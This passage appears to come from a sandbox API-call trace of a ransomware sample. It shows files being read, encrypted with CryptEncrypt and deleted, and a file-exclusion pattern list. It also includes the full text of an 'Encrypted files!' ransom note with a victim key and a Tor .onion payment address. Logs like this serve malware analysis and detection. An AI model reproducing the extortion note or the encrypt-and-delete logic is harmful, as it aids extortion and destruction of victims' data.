lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.143] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.143] GetLastError () returned 0x0 [0159.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.143] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.143] GetLastError () returned 0x0 [0159.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.143] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.143] GetLastError () returned 0x0 [0159.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.144] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.144] GetLastError () returned 0x0 [0159.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.144] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.144] GetLastError () returned 0x0 [0159.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.144] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.144] GetLastError () returned 0x0 [0159.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.144] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.144] GetLastError () returned 0x0 [0159.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.144] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.144] GetLastError () returned 0x0 [0159.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.144] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.144] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.144] GetLastError () returned 0x0 [0159.144] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.145] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.145] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.145] GetLastError () returned 0x0 [0159.145] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.145] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.145] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0159.145] GetLastError () returned 0x0 [0159.145] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0159.145] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.145] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui")) returned 0x20 [0159.145] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0159.145] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui") returned 1 [0159.145] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui")) returned 0 [0159.146] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" [0159.146] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR") returned 1 [0159.146] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\.xXE0F1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\.xxe0f1.tmp")) returned 0xe0f1 [0159.147] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\.xXE0F1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\.xxe0f1.tmp"), dwFlags=0x1) returned 0 [0159.147] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\.xXE0F1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\.xxe0f1.tmp")) returned 1 [0159.147] CryptDestroyKey (hKey=0x9ad438) returned 1 [0159.147] wcslen (_String="OK") returned 0x2 [0159.147] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.147] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.147] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0159.147] CryptDestroyHash (hHash=0x9ad338) returned 1 [0159.147] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0159.147] FindNextFileW (in: hFindFile=0x9ad778, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0159.147] GetLastError () returned 0x12 [0159.147] FindClose (in: hFindFile=0x9ad778 | out: hFindFile=0x9ad778) returned 1 [0159.147] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0159.148] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.148] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.149] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.149] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.149] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.149] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.149] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.149] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*.exe") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*.dll") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*.lnk") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*.bat") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*.ini") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*.msi") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*.scf") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*pagefile.sys*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*AppData*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*\\winrar\\*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*\\java\\*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*\\windows\\*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*\\ESET\\*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*\\AVG\\*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*Atheros*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*Realtek*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*bootmgr*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*boot*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*boot*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*IO.SYS*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*ntldr*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*chrome*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*opera*") returned 0 [0159.149] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", pszSpec="*firefox*") returned 0 [0159.149] wcslen (_String="\\\\?\\") returned 0x4 [0159.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad738 [0159.150] wcscmp (_String1=".", _String2=".") returned 0 [0159.150] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.150] wcscmp (_String1="..", _String2=".") returned 1 [0159.150] wcscmp (_String1="..", _String2="..") returned 0 [0159.150] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.150] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.151] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.151] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.151] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.151] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0159.151] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.151] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.151] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.151] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0159.151] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.151] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.151] strlen (_Str="NMoreira") returned 0x8 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.151] CryptGenRandom (in: 